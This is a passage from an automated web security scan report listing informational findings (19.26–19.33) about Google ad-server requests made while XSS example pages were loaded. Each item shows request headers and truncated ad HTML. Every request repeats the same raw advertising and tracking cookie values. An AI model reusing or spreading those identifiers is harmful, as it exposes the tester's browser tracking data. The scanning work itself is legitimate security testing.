Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:56 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/bostonherald.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DAutoTrader.com%26adT%3DNewspaper%26adU%3Dwww.bp.com%26adT%3DBP%2526%252339%253Bs%2BWork%2Bin%2Bthe%2BGulf%26adU%3DMastersinLaw.TJSL.edu%26adT%3DThomas%2BJefferson%2BLaw%26gl%3DUS&amp;usg=AFQjCNHASrd2VzZwGa2zk51SVYi_wt--2w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

19.26. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766894&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapitalone.com.html&dt=1301748894928&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748894941&frm=0&adk=1607234649&ga_vid=1572829511.1301748895&ga_sid=1301748895&ga_hid=2001588798&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=19&xpc=Ax6IEkS3xE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capitalone.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26adU%3Dwww.CreditCards.com%26adT%3DApply%2BFor%2BA%2BCredit%2BCard%26adU%3Dwww.CreditCardGuide.com%26adT%3DGet%2BA%2BVisa%2BCredit%2BCard%26gl%3DUS&amp;usg=AFQjCNEk9wsU5RiO4EKd9Zl5A5MNRIc-qw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.27. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998815&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbroadband.espn.go.com.html&dt=1301749256008&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749256019&frm=0&adk=1607234649&ga_vid=646082387.1301749256&ga_sid=1301749256&ga_hid=1790351584&ga_fc=0&u_tz=-300&u_his=39&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=diNPn6jftu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:00:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/broadband.espn.go.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLocalXpress.com%26adT%3DBroadband%2BInternet%26adU%3DTopicologist.com%26adT%3D%25249/Mo%2BWireless%2BBroadband%26adU%3DCableOneAuthorizedOffers.com%26adT%3DCableOne%2BOffers%26gl%3DUS&amp;usg=AFQjCNH1EELYB0AkBHgxLIX7SYoXgxMOOA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.28. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767225&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbostonherald.com.html&dt=1301749225844&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749225857&frm=0&adk=1607234649&ga_vid=765306459.1301749226&ga_sid=1301749226&ga_hid=1991501193&ga_fc=0&u_tz=-300&u_his=36&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=17&xpc=DX3fYrOiHZ&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4268

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bostonherald.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG7Xkxz4Q78CO7GEN1DGO-VlDSYLQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.29. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss.flowplayer.org.html&dt=1301748848600&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748848607&frm=0&adk=1607234649&ga_vid=807912304.1301748849&ga_sid=1301748849&ga_hid=86418383&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=12&xpc=VMlqWg7Beh&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:32 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12332

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss.flowplayer.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.akamai.com/StateofTheInternet%26adT%3DDenial%2BOf%2BService%2BAttacks%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNHVMaKNuBuLqHSHKadZcIeUzYWaww" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.30. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766923&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcaptavi.com.xss-cross-site-scripting.html&dt=1301748923897&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748923902&frm=0&adk=1607234649&ga_vid=659960906.1301748924&ga_sid=1301748924&ga_hid=790357082&ga_fc=0&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=13&xpc=VkCa5B0XKN&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:47 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/captavi.com.xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNGVrDJGMTA_Sq_04tReG32pDakoGA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.31. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767086&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-dork-example-poc.html&dt=1301749086707&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749086718&frm=0&adk=1607234649&ga_vid=436285111.1301749087&ga_sid=1301749087&ga_hid=392169975&ga_fc=0&u_tz=-300&u_his=24&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=17&xpc=sAHbAJuNT9&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4376

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss-cross-site-scripting-dork-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHpTPSA9tFARWaQV6O8UdzDGeuitw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.32. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766955&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcareers.redhat.com.html&dt=1301748955253&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748955264&frm=0&adk=1607234649&ga_vid=252168462.1301748955&ga_sid=1301748955&ga_hid=97544560&ga_fc=0&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=Wt08AHuOaP&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:19 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4273

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/careers.redhat.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFMLPXFDt58eTwNfw3PyKRGwimdTw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.33. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767038&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749038337&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749038350&frm=0&adk=1607234649&ga_vid=1619082733.1301749038&ga_sid=1301749038&ga_hid=1473851727&ga_fc=0&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=24&xpc=PdISGmTx4Q&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:56:42 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12401

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
